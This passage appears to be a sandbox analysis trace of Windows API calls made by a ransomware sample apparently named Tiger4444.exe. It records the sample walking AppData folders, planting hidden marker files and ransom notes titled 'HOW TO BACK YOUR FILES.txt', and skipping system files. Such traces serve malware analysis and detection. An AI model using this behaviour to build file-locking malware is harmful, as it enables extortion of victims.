lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841fbfdc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.186] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.186] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.186] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.186] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.186] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.186] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x841fbfdc, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x841fbfdc, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x841fbfdc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.186] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.186] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.186] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0052.186] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.186] lstrcmpiW (lpString1="1033", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.186] lstrcmpiW (lpString1="1033", lpString2="Tiger4444.exe") returned -1 [0052.186] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0052.186] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0052.186] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0052.186] lstrcmpiW (lpString1="1033", lpString2="bootmgr") returned -1 [0052.186] lstrcmpiW (lpString1="1033", lpString2="pagefile.sys") returned -1 [0052.187] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0052.187] lstrcmpiW (lpString1="1033", lpString2="ids.txt") returned -1 [0052.187] lstrcmpiW (lpString1="1033", lpString2="NTUSER.DAT") returned -1 [0052.187] lstrcpyW (in: lpString1=0x30aeb5e, lpString2="1033" | out: lpString1="1033") returned="1033" [0052.187] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc913a8 [0052.187] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc0) returned 0xc61df8 [0052.187] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc913b0 | out: ListHead=0xc66828, ListEntry=0xc913b0) returned 0xc914b0 [0052.187] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0052.187] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.187] lstrcpyW (in: lpString1=0x30aeb5e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.187] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.188] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.188] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.189] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.189] CloseHandle (hObject=0x2c8) returned 1 [0052.189] CloseHandle (hObject=0x2ac) returned 1 [0052.189] GetCurrentThreadId () returned 0xfa8 [0052.189] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc913b0 [0052.189] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0052.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61df8 | out: hHeap=0xc50000) returned 1 [0052.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc913a8 | out: hHeap=0xc50000) returned 1 [0052.189] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0052.189] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\" [0052.189] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3" [0052.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.190] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.192] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.194] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.194] CloseHandle (hObject=0x2ac) returned 1 [0052.194] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned 95 [0052.194] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.194] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841fbfdc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0052.194] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.194] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.195] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.195] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.195] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841fbfdc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.195] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.195] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.195] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.195] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.195] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.195] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x841fbfdc, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x841fbfdc, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x841fbfdc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.195] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.195] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.195] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x841fbfdc, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x841fbfdc, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x841fbfdc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.195] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0052.195] lstrcpyW (in: lpString1=0x30aeb68, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.195] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.195] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.195] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.196] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.196] CloseHandle (hObject=0x2c8) returned 1 [0052.196] CloseHandle (hObject=0x2ac) returned 1 [0052.196] GetCurrentThreadId () returned 0xfa8 [0052.196] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc914b0 [0052.196] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0052.196] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0052.196] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc914a8 | out: hHeap=0xc50000) returned 1 [0052.196] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0052.196] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0052.196] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.BFC0E91B00AE8A0620D3" [0052.196] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.197] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.199] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.200] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.200] CloseHandle (hObject=0x2ac) returned 1 [0052.201] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 60 [0052.201] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.201] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab505145, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x842221c0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f48 [0052.201] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.201] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.201] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.201] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.201] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab505145, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x842221c0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.201] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.201] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.201] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.201] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.201] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.201] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842221c0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842221c0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x842221c0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.201] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.201] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.201] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc6243272, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc6243272, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0052.201] lstrcmpiW (lpString1="My", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.201] lstrcmpiW (lpString1="My", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.201] lstrcmpiW (lpString1="My", lpString2="Tiger4444.exe") returned -1 [0052.201] lstrcmpiW (lpString1="My", lpString2=".") returned 1 [0052.201] lstrcmpiW (lpString1="My", lpString2="..") returned 1 [0052.201] lstrcmpiW (lpString1="My", lpString2="windows") returned -1 [0052.201] lstrcmpiW (lpString1="My", lpString2="bootmgr") returned 1 [0052.201] lstrcmpiW (lpString1="My", lpString2="pagefile.sys") returned -1 [0052.201] lstrcmpiW (lpString1="My", lpString2="boot") returned 1 [0052.201] lstrcmpiW (lpString1="My", lpString2="ids.txt") returned 1 [0052.202] lstrcmpiW (lpString1="My", lpString2="NTUSER.DAT") returned -1 [0052.202] lstrcpyW (in: lpString1=0x30aeb22, lpString2="My" | out: lpString1="My") returned="My" [0052.202] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91588 [0052.202] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x80) returned 0xc72258 [0052.202] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91590 | out: ListHead=0xc66828, ListEntry=0xc91590) returned 0xc91510 [0052.202] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc6243272, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc6243272, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0052.202] FindClose (in: hFindFile=0xc72f48 | out: hFindFile=0xc72f48) returned 1 [0052.202] lstrcpyW (in: lpString1=0x30aeb22, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.202] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.203] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.204] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.204] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.204] CloseHandle (hObject=0x2c8) returned 1 [0052.204] CloseHandle (hObject=0x2ac) returned 1 [0052.204] GetCurrentThreadId () returned 0xfa8 [0052.204] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91590 [0052.204] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0052.204] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0052.204] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91588 | out: hHeap=0xc50000) returned 1 [0052.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0052.204] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0052.204] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.BFC0E91B00AE8A0620D3" [0052.204] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.242] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.244] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.245] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.245] CloseHandle (hObject=0x2ac) returned 1 [0052.246] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 63 [0052.246] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.246] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc6328090, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x84294a31, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73088 [0052.246] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.246] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.246] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.246] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.246] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, 